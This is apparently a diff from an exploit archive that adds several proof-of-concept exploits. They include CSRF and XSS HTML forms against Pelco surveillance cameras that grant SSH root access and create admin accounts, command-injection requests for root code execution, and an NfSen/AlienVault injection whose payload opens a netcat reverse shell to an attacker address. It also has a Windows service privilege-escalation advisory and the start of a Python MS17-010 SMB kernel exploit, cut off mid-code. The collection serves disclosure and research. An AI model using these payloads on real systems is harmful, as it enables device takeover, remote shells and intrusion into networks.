 42309,platforms/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps,0
 42311,platforms/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps,0
 42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0
 42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0
--- a/platforms/hardware/webapps/42307.txt
+++ b/platforms/hardware/webapps/42307.txt
@ -0,0 +1,168 @@
 Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
 Vendor: Schneider Electric SE
 Product web page: https://www.pelco.com
 Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
                  Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
                  Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
 Summary: Pelco offers the broadest selection of IP cameras designed
 for security surveillance in a wide variety of commercial and industrial
 settings. From our industry-leading fixed and high-speed IP cameras to
 panoramic, thermal imaging, explosionproof and more, we offer a camera
 for any environment, any lighting condition and any application.
 When nothing but the best will do. Sarix™ Enhanced Range cameras
 provide the most robust feature-set for your mission-critical applications.
 With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
 in difficult lighting conditions such as a combination of bright areas,
 shaded areas, and intense light. Designed with superior reliability,
 fault tolerance, and processing speed, these rugged fixed IP cameras
 ensure you always get the video that you need.
 Desc: Pelco cameras suffer from multiple dom-based, stored and reflected
 XSS vulnerabilities when input passed via several parameters to several
 scripts is not properly sanitized before being returned to the user.
 This can be exploited to execute arbitrary HTML and script code in a
 user's browser session in context of an affected site.
 Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
           MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
           Lighttpd/1.4.28
           PHP/5.3.0
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5415
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
 07.04.2017
 --
 CSRF/XSS on username parameter:
 -------------------------------
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/network/dot1x/update" method="POST">
      <input type="hidden" name="dot1x" value="on" />
      <input type="hidden" name="protocol" value="EAP&#45;TLS" />
      <input type="hidden" name="inner&#95;auth" value="CHAP" />
      <input type="hidden" name="username" value='"><script>alert(1)</script>' />
      <input type="hidden" name="password" value="blah" />
      <input type="hidden" name="anonymous&#95;id" value="&#13;" />
      <input type="hidden" name="ca&#95;certificate" value="test" />
      <input type="hidden" name="client&#95;certificate" value="test" />
      <input type="hidden" name="private&#95;key" value="test" />
      <input type="hidden" name="private&#95;key&#95;password" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
 -------------------------------------------------------------------------------------------------------
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/network/general/update" method="POST">
      <input type="hidden" name="hostname" value='"><script>alert(2)</script>' />
      <input type="hidden" name="http&#95;port" value='"><script>alert(3)</script>' />
      <input type="hidden" name="rtsp&#95;port" value='"><script>alert(4)</script>' />
      <input type="hidden" name="dhcp" value="off" />
      <input type="hidden" name="ip&#95;address" value='"><script>alert(5)</script>' />
      <input type="hidden" name="subnet&#95;mask" value='"><script>alert(6)</script>' />
      <input type="hidden" name="gateway" value='"><script>alert(7)</script>' />
      <input type="hidden" name="nameservers" value='"><script>alert(8)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 CSRF/XSS on version parameter:
 ------------------------------
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/network/snmp/update" method="POST">
      <input type="hidden" name="version" value='";alert(9)//' />
      <input type="hidden" name="v2&#95;community&#95;string" value="public" />
      <input type="hidden" name="v2&#95;receiver&#95;address" value="" />
      <input type="hidden" name="v2&#95;trap&#95;community&#95;string" value="trapbratce" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
 ----------------------------------------------------------------------------
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/system/general/update" method="POST">
      <input type="hidden" name="device&#95;name" value='ZSL"><script>alert(10)</script>' />
      <input type="hidden" name="enable&#95;leds" value="on" />
      <input type="hidden" name="smtp&#95;server" value='"><script>alert(11)</script>' />
      <input type="hidden" name="ntp&#95;server&#95;from&#95;dhcp" value="false" />
      <input type="hidden" name="ntp&#95;server" value="';alert(12)//'" />
      <input type="hidden" name="region" value="Macedonia';alert(13)//" />
      <input type="hidden" name="zone" value="Kumanovo';alert(14)//" />
      <input type="hidden" name="enable&#95;time&#95;overlay" value="on" />
      <input type="hidden" name="enable&#95;name&#95;overlay" value="off" />
      <input type="hidden" name="position" value="topright" />
      <input type="hidden" name="date&#95;format" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
 --------------------------------------------------------------------------------
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/events/handlers/update" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="relay&#95;sentinel" value="relay&#95;sentinel" />
      <input type="hidden" name="name" value='"><script>alert(15)</script>' />
      <input type="hidden" name="type" value="Ftp" />
      <input type="hidden" name="email&#95;to" value="" />
      <input type="hidden" name="email&#95;from" value="" />
      <input type="hidden" name="email&#95;subject" value="" />
      <input type="hidden" name="email&#95;message" value="" />
      <input type="hidden" name="dest&#95;name" value="IMG&#37;m&#37;d&#37;Y&#37;H&#37;M&#37;S&#46;jpg" />
      <input type="hidden" name="limit&#95;size" value="" />
      <input type="hidden" name="limit&#95;size&#95;scale" value="K" />
      <input type="hidden" name="ftp&#95;server" value='"><script>alert(16)</script>' />
      <input type="hidden" name="ftp&#95;username" value='"><script>alert(17)</script>' />
      <input type="hidden" name="ftp&#95;password" value='"><script>alert(18)</script>' />
      <input type="hidden" name="ftp&#95;base&#95;path" value='"><script>alert(19)</script>' />
      <input type="hidden" name="ftp&#95;dest&#95;name" value="IMG&#37;m&#37;d&#37;Y&#37;H&#37;M&#37;S&#46;jpg" />
      <input type="hidden" name="relay&#95;bankName" value="GPIO" />
      <input type="hidden" name="relay&#95;index" value="0" />
      <input type="hidden" name="relay&#95;on&#95;time" value="0&#46;1" />
      <input type="hidden" name="relay&#95;off&#95;time" value="0&#46;1" />
      <input type="hidden" name="relay&#95;pulse&#95;count" value="" />
      <input type="hidden" name="filter&#95;start0" value="" />
      <input type="hidden" name="filter&#95;stop0" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
--- a/platforms/hardware/webapps/42308.txt
+++ b/platforms/hardware/webapps/42308.txt
@ -0,0 +1,82 @@
 Schneider Electric Pelco Sarix/Spectra Cameras CSRF Enable SSH Root Access
 Vendor: Schneider Electric SE
 Product web page: https://www.pelco.com
 Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
                  Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
                  Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
 Summary: Pelco offers the broadest selection of IP cameras designed
 for security surveillance in a wide variety of commercial and industrial
 settings. From our industry-leading fixed and high-speed IP cameras to
 panoramic, thermal imaging, explosionproof and more, we offer a camera
 for any environment, any lighting condition and any application.
 When nothing but the best will do. Sarix™ Enhanced Range cameras
 provide the most robust feature-set for your mission-critical applications.
 With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
 in difficult lighting conditions such as a combination of bright areas,
 shaded areas, and intense light. Designed with superior reliability,
 fault tolerance, and processing speed, these rugged fixed IP cameras
 ensure you always get the video that you need.
 Desc: The application interface allows users to perform certain actions
 via HTTP requests without performing any validity checks to verify the
 requests. This can be exploited to perform certain actions with administrative
 privileges if a logged-in user visits a malicious web site.
 Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
           MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
           Lighttpd/1.4.28
           PHP/5.3.0
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5416
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5416.php
 07.04.2017
 --
 CSRF enable ssh root access:
 ----------------------------
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/network/ssh/update" method="POST">
      <input type="hidden" name="enabled" value="1" />
      <input type="hidden" name="password" value="root123" />
      <input type="hidden" name="password&#95;confirmation" value="root123" />
      <input type="submit" value="Go root" />
    </form>
  </body>
 </html>
 CSRF add admin:
 ---------------
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/auth/users/create" method="POST">
      <input type="hidden" name="original&#95;username" value="" />
      <input type="hidden" name="mode" value="create" />
      <input type="hidden" name="group" value="admins" />
      <input type="hidden" name="username" value="pelco_admin" />
      <input type="hidden" name="password" value="pelco_pass" />
      <input type="hidden" name="password&#95;confirmation" value="pelco_pass" />
      <input type="submit" value="Add admin" />
    </form>
  </body>
 </html>
--- a/platforms/hardware/webapps/42309.txt
+++ b/platforms/hardware/webapps/42309.txt
@ -0,0 +1,191 @@
 Schneider Electric Pelco Sarix/Spectra Cameras Root Remote Code Execution
 Vendor: Schneider Electric SE
 Product web page: https://www.pelco.com
 Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
                  Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
                  Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
 Summary: Pelco offers the broadest selection of IP cameras designed
 for security surveillance in a wide variety of commercial and industrial
 settings. From our industry-leading fixed and high-speed IP cameras to
 panoramic, thermal imaging, explosionproof and more, we offer a camera
 for any environment, any lighting condition and any application.
 When nothing but the best will do. Sarix™ Enhanced Range cameras
 provide the most robust feature-set for your mission-critical applications.
 With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
 in difficult lighting conditions such as a combination of bright areas,
 shaded areas, and intense light. Designed with superior reliability,
 fault tolerance, and processing speed, these rugged fixed IP cameras
 ensure you always get the video that you need.
 Desc: The affected cameras suffer from authenticated remote code
 execution vulnerability. The POST parameter 'enable_leds' located
 in the update() function called via the GeneralSetupController.php
 script is not properly sanitised before being used in writeLedConfig()
 function to enable led state to on or off. A remote attacker can
 exploit this issue and execute arbitrary system commands granting
 her system access with root privileges using a specially crafted
 request and escape sequence to system shell.
 ---------------------------------------------------------------------------
 /var/www/core/setup/controllers/GeneralSetupController.php:
 -----------------------------------------------------------
 43: public function update() {
 44:         $errOccurred = false;
 45:         $logoreboot = false;
 46: 
 47:         // If can update general settings
 48:         if ($this->_context->_user->hasPermission("{51510980-768b-4b26-a44a-2ae49f308184}")) {
 49:
 50:             $errors = $this->validateInputs("setup", "general.invalid");
 51:
 52: //
 53:             $new_logo_path;
 54:             if (empty($errors) && (strlen($_FILES["new_logo_path"]["name"]) > 0)) {
 55:                 // The user has provided a file to load in as an image.  Verify that the file is ok.
 56:                 $errors = $this->storeBmpFileIfValid($new_logo_path, $width, $height);
 57:             } else {
 58:                 // In this case, get the width and height from the omons settings
 59:                 $width = intval($this->_conf->get("Video/Overlay", "LogoWidth"));
 60:                 $height = intval($this->_conf->get("Video/Overlay", "LogoHeight"));
 61:             }
 62: //
 63:             if (empty($errors)) {
 64:                 $device_name = $_POST["device_name"];
 65:
 66:                 $this->_conf->set("Device", "FriendlyName", $device_name);
 67:
 68:                 // update smtp server; append port 25 if it's not provided by the user
 69:                 $smtpServer = $_POST["smtp_server"];
 70:
 71:                 if ((! empty($smtpServer)) && preg_match(self::kHostPortRegex, $smtpServer) == 0) {
 72:                     $smtpServer .= ":" . self::kDefaultSmtpPort;
 73:                 }
 74:
 75:                 $this->_conf->set("Networking", "SmtpServer", $smtpServer);
 76:
 77: //
 78:                 $success = $this->writeLedConfig($_POST["enable_leds"]);
 79: //
 80:             } else {
 81:                 $this->_context->setError("phobos", "validation.failure");
 82:                 $this->_context->setErrorList($errors);
 83:
 84:                 $errOccurred = true;
 85:             }
 86:         }
 ...
 ...
 ...
 Bonus hint: When uploading a bmp logo, you can modify the width offset for example and inject persistent code:
 --
 -> 12h: 00 01 00 00 ; width (max 0x100, min 0x20)
 --
 191:             if ($logoOverlay) {
 192:                 if($logoreboot) {
 193:                     $cmd = "/usr/bin/overlayLogo " . $logo_justification . " " . $logo_row . " " . $width  . " " .  $height . " 0";
 194:                     exec($cmd);
 195:                 }
 196:             } else {                
 197:                 $cmd = "/usr/bin/overlayLogo 1 1 1 1 1";
 198:                 exec($cmd);
 199:             }                
 ...
 ...
 ...
 265:         $vparams["enable_leds"] = $this->getLedConfig();
 266: //
 267:         $vparams["device_name"]  = $this->_conf->get("Device", "FriendlyName");
 268:         $vparams["TimeFormat"] = $this->_conf->get("Video/Overlay", "TimeFormat");        
 269:         $vparams["date_formats"] = $this->getDateFormats();
 270:         $vparams["selectedDateFormat"] = $this->_conf->get("Video/Overlay", "DateFormat");
 271:
 272:         ob_start();
 273:         passthru("date +\"" . $vparams["TimeFormat"] . "\"");
 274:         $vparams["current_time"] = trim(ob_get_contents());
 275:         ob_end_clean();
 ...
 ...
 ...
 630:     /** @param $state string "on" or "off" */
 631:     protected function writeLedConfig($state) {
 632:         $encoded = array('type' => 'uint32',
 633:             'value' => ($state == 'on' ? 1 : 0));
 634:
 635:         $rest = $this->getRestProxy();
 636:         $params = array(array('type' => 'uint32', 'value' => 10), $encoded);
 637:         $response = $rest->GetWithPayload('/internal/msgbus/com.pelco.hardware.led/SetState?',
 638:                                'application/json',
 639:                                $params);
 640:
 641:         return ($response->GetStatus() == 200);
 642:     }
 ---------------------------------------------------------------------------
 Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
           MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
           Lighttpd/1.4.28
           PHP/5.3.0
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5417
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5417.php
 07.04.2017
 --
 PoC sleep 17s:
 POST /setup/system/general/update HTTP/1.1
 Host: 192.168.1.1
 Content-Length: x
 Cache-Control: max-age=0
 Origin: http://192.168.1.1
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Referer: http://192.168.1.1/setup/system/general
 Accept-Language: en-US,en;q=0.8,mk;q=0.6
 Cookie: PHPSESSID=p2ooorb7gloavc0et2stj2tnn4; authos-token=07E14CAF; svcts=1495616826
 Connection: close
 device_name=ZSL&enable_leds=%60sleep%2017%60&smtp_server=&ntp_server_from_dhcp=false&ntp_server=time.nist.gov&region=Universe&zone=Earth&enable_time_overlay=on&enable_name_overlay=off&position=topright&date_format=0
 ===
 PoC echo:
 POST /setup/system/general/update HTTP/1.1
 Host: 192.168.1.1
 enable_leds=%60echo%20251%20>test.html%60
 --
 GET http://192.168.1.1/test.html HTTP/1.1
 Response:
 251
--- a/platforms/linux/webapps/42306.txt
+++ b/platforms/linux/webapps/42306.txt
--- a/platforms/linux/webapps/42314.txt
+++ b/platforms/linux/webapps/42314.txt
@ -0,0 +1,28 @@
 # Exploit Title: NfSen/AlienVault remote root exploit (command injection in customfmt parameter)
 # Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected.
 # Version: AlienVault USM/OSSIM < 4.3.1
 # Date: 2017-07-10
 # Vendor Homepage: http://nfsen.sourceforge.net/
 # Vendor Homepage: http://www.alienvault.com/
 # Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
 # Exploit Author: Paul Taylor / Foregenix Ltd
 # Website: http://www.foregenix.com/blog
 # Tested on: NfSen 1.3.7
 # CVE: CVE-2017-7175, CVE-2017-6972
 1. Description
 A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972.
 2. Proof of Concept
 For a reverse shell to attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the "Custom output format:" input box:
 '; nc -ne /bin/bash 10.100.1.2 443 #
 If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability.
 3. Solution:
 Update to latest version of NfSen/USM/OSSIM
--- a/platforms/windows/local/42310.txt
+++ b/platforms/windows/local/42310.txt
@ -0,0 +1,107 @@
 Schneider Electric Pelco VideoXpert Privilege Escalations
 Vendor: Schneider Electric SE
 Product web page: https://www.pelco.com
 Affected version: Core Software 1.12.105
                  Media Gateway Software 1.12.26
                  Exports 1.12
 Summary: VideoXpert is a video management solution designed for
 scalability, fitting the needs surveillance operations of any size.
 VideoXpert Ultimate can also aggregate other VideoXpert systems,
 tying multiple video management systems into a single interface.
 Desc: The application is vulnerable to an elevation of privileges
 vulnerability which can be used by a simple user that can change
 the executable file with a binary of choice. The vulnerability exist
 due to the improper permissions, with the 'F' flag (full) for the
 'Users' group, for several binary files. The service is installed
 by default to start on system boot with LocalSystem privileges.
 Attackers can replace the binary with their rootkit, and on reboot
 they get SYSTEM privileges.
 VideoXpert services also suffer from an unquoted search path issue
 impacting the 'VideoXpert Core' and 'VideoXpert Exports' services
 for Windows deployed as part of the VideoXpert Setup bundle. This
 could potentially allow an authorized but non-privileged local user
 to execute arbitrary code with elevated privileges on the system. A 
 successful attempt would require the local user to be able to insert
 their code in the system root path undetected by the OS or other security
 applications where it could potentially be executed during application
 startup or reboot. If successful, the local user’s code would execute
 with the elevated privileges of the application.
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5418
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5418.php
 05.04.2017
 --
 C:\Program Files\Pelco\Core>sc qc "VideoXpert Core"
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: VideoXpert Core
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Pelco\Core\tools\nssm.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VideoXpert Core
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\>cacls "C:\Program Files\Pelco\Core\tools\nssm.exe"
 C:\Program Files\Pelco\Core\tools\nssm.exe NT AUTHORITY\SYSTEM:(ID)F
                                           BUILTIN\Administrators:(ID)F
                                           BUILTIN\Users:(ID)R
 C:\ProgramData\Pelco\Core\db\bin>cacls * |findstr "Users:(ID)F"
 C:\ProgramData\Pelco\Core\db\bin\libeay32.dll BUILTIN\Users:(ID)F
 C:\ProgramData\Pelco\Core\db\bin\mongod.exe BUILTIN\Users:(ID)F
 C:\ProgramData\Pelco\Core\db\bin\mongos.exe BUILTIN\Users:(ID)F
 C:\ProgramData\Pelco\Core\db\bin\nssm.exe BUILTIN\Users:(ID)F
 C:\ProgramData\Pelco\Core\db\bin\ssleay32.dll BUILTIN\Users:(ID)F
 C:\>cacls "C:\ProgramData\Pelco\Exports\bin\nssm.exe"
 C:\ProgramData\Pelco\Exports\bin\nssm.exe BUILTIN\Users:(ID)F
                                          NT AUTHORITY\SYSTEM:(ID)F
                                          BUILTIN\Administrators:(ID)F
 C:\>cacls "C:\ProgramData\Pelco\Gateway\bin\nssm.exe"
 C:\ProgramData\Pelco\Gateway\bin\nssm.exe BUILTIN\Users:(ID)F
                                          NT AUTHORITY\SYSTEM:(ID)F
                                          BUILTIN\Administrators:(ID)F
 C:\Users\senad>sc qc "VideoXpert Exports"
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: VideoXpert Exports
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\ProgramData\Pelco\Exports\bin\nssm.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VideoXpert Exports
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
--- a/platforms/windows/remote/42315.py
+++ b/platforms/windows/remote/42315.py
@ -0,0 +1,538 @@
 #!/usr/bin/python
 from impacket import smb, smbconnection
 from mysmb import MYSMB
 from struct import pack, unpack, unpack_from
 import sys
 import socket
 import time
 '''
 MS17-010 exploit for Windows 7+ by sleepya
 Note:
 - The exploit should never crash a target (chance should be nearly 0%)
 - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
 Tested on:
 - Windows 2016 x64
 - Windows 2012 R2 x64
 - Windows 8.1 x64
 - Windows 2008 R2 SP1 x64
 - Windows 7 SP1 x64
 - Windows 8.1 x86
 - Windows 7 SP1 x86
 '''
 USERNAME = ''
 PASSWORD = ''
 '''
 Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
 win7 x64
 struct SrvSecContext {
 	DWORD xx1; // second WORD is size
 	DWORD refCnt;
 	PACCESS_TOKEN Token;  // 0x08
 	DWORD xx2;
 	BOOLEAN CopyOnOpen; // 0x14
 	BOOLEAN EffectiveOnly;
 	WORD xx3;
 	DWORD ImpersonationLevel; // 0x18
 	DWORD xx4;
 	BOOLEAN UsePsImpersonateClient; // 0x20
 }
 win2012 x64
 struct SrvSecContext {
 	DWORD xx1; // second WORD is size
 	DWORD refCnt;
 	QWORD xx2;
 	QWORD xx3;
 	PACCESS_TOKEN Token;  // 0x18
 	DWORD xx4;
 	BOOLEAN CopyOnOpen; // 0x24
 	BOOLEAN EffectiveOnly;
 	WORD xx3;
 	DWORD ImpersonationLevel; // 0x28
 	DWORD xx4;
 	BOOLEAN UsePsImpersonateClient; // 0x30
 }
 SrvImpersonateSecurityContext() is used in Windows 7 and later before doing any operation as logged on user.
 It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. 
 From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL,
 PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns
 STATUS_SUCCESS when Token is NULL.
 If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM)
 to do all SMB operations.
 Note: fake Token might be possible, but NULL token is much easier.
 '''
 WIN7_INFO = {
 	'SESSION_SECCTX_OFFSET': 0xa0,
 	'SESSION_ISNULL_OFFSET': 0xba,
 	'FAKE_SECCTX': pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
 	'SECCTX_SIZE': 0x28,
 }
 WIN7_32_INFO = {
 	'SESSION_SECCTX_OFFSET': 0x80,
 	'SESSION_ISNULL_OFFSET': 0x96,
 	'FAKE_SECCTX': pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
 	'SECCTX_SIZE': 0x1c,
 }
 # win8+ info
 WIN8_INFO = {
 	'SESSION_SECCTX_OFFSET': 0xb0,
 	'SESSION_ISNULL_OFFSET': 0xca,
 	'FAKE_SECCTX': pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
 	'SECCTX_SIZE': 0x38,
 }
 WIN8_32_INFO = {
 	'SESSION_SECCTX_OFFSET': 0x88,
 	'SESSION_ISNULL_OFFSET': 0x9e,
 	'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
 	'SECCTX_SIZE': 0x24,
 }
 X86_INFO = {
 	'PTR_SIZE' : 4,
 	'PTR_FMT' : 'I',
 	'FRAG_TAG_OFFSET' : 12,
 	'POOL_ALIGN' : 8,
 	'SRV_BUFHDR_SIZE' : 8,
 	'TRANS_SIZE' : 0xa0,  # struct size
 	'TRANS_FLINK_OFFSET' : 0x18,
 	'TRANS_INPARAM_OFFSET' : 0x40,
 	'TRANS_OUTPARAM_OFFSET' : 0x44,
 	'TRANS_INDATA_OFFSET' : 0x48,
 	'TRANS_OUTDATA_OFFSET' : 0x4c,
 	'TRANS_FUNCTION_OFFSET' : 0x72,
 	'TRANS_MID_OFFSET' : 0x80,
 }
 X64_INFO = {
 	'PTR_SIZE' : 8,
 	'PTR_FMT' : 'Q',
 	'FRAG_TAG_OFFSET' : 0x14,
 	'POOL_ALIGN' : 0x10,
 	'SRV_BUFHDR_SIZE' : 0x10,
 	'TRANS_SIZE' : 0xf8,  # struct size
 	'TRANS_FLINK_OFFSET' : 0x28,
 	'TRANS_INPARAM_OFFSET' : 0x70,
 	'TRANS_OUTPARAM_OFFSET' : 0x78,
 	'TRANS_INDATA_OFFSET' : 0x80,
 	'TRANS_OUTDATA_OFFSET' : 0x88,
 	'TRANS_FUNCTION_OFFSET' : 0xb2,
 	'TRANS_MID_OFFSET' : 0xc0,
 }
 def wait_for_request_processed(conn):
 	#time.sleep(0.05)
 	# send echo is faster than sleep(0.05) when connection is very good
 	conn.send_echo('a')
 special_mid = 0
 extra_last_mid = 0
 def reset_extra_mid(conn):
 	global extra_last_mid, special_mid
 	special_mid = (conn.next_mid() & 0xff00) - 0x100
 	extra_last_mid = special_mid
 def next_extra_mid():
 	global extra_last_mid
 	extra_last_mid += 1
 	return extra_last_mid
 # Borrow 'groom' and 'bride' word from NSA tool
 # GROOM_TRANS_SIZE includes transaction name, parameters and data
 GROOM_TRANS_SIZE = 0x5010
 def calc_alloc_size(size, align_size):
 	return (size + align_size - 1) & ~(align_size-1)
 def leak_frag_size(conn, tid, fid, info):
 	# A "Frag" pool is placed after the large pool allocation if last page has some free space left.
 	# A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version.
 	# To make exploit more generic, exploit does info leak to find a "Frag" pool size.
 	# From the leak info, we can determine the target architecture too.
 	mid = conn.next_mid()
 	req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-4)
 	req2 = conn.create_nt_trans_secondary_packet(mid, data='B'*276) # leak more 276 bytes
 	conn.send_raw(req1[:-8])
 	conn.send_raw(req1[-8:]+req2)
 	leakData = conn.recv_transaction_data(mid, 0x10d0+276)
 	leakData = leakData[0x10d4:]  # skip parameters and its own input
 	if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
 		print('Target is 32 bit')
 		if info['SESSION_SECCTX_OFFSET'] == WIN7_INFO['SESSION_SECCTX_OFFSET']:
 			info.update(WIN7_32_INFO)
 		elif info['SESSION_SECCTX_OFFSET'] == WIN8_INFO['SESSION_SECCTX_OFFSET']:
 			info.update(WIN8_32_INFO)
 		else:
 			print('The exploit does not support this 32 bit target')
 			sys.exit()
 		info.update(X86_INFO)
 	elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
 		print('Target is 64 bit')
 		info.update(X64_INFO)
 	else:
 		print('Not found Frag pool tag in leak data')
 		sys.exit()
 	# Calculate frag pool size
 	info['FRAG_POOL_SIZE'] = ord(leakData[ info['FRAG_TAG_OFFSET']-2 ]) * info['POOL_ALIGN']
 	print('Got frag size: 0x{:x}'.format(info['FRAG_POOL_SIZE']))
 	# groom: srv buffer header
 	info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
 	print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
 	# groom paramters and data is alignment by 8 because it is NT_TRANS
 	info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - 4 - 4 - info['TRANS_SIZE']  # empty transaction name (4), alignment (4)
 	# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
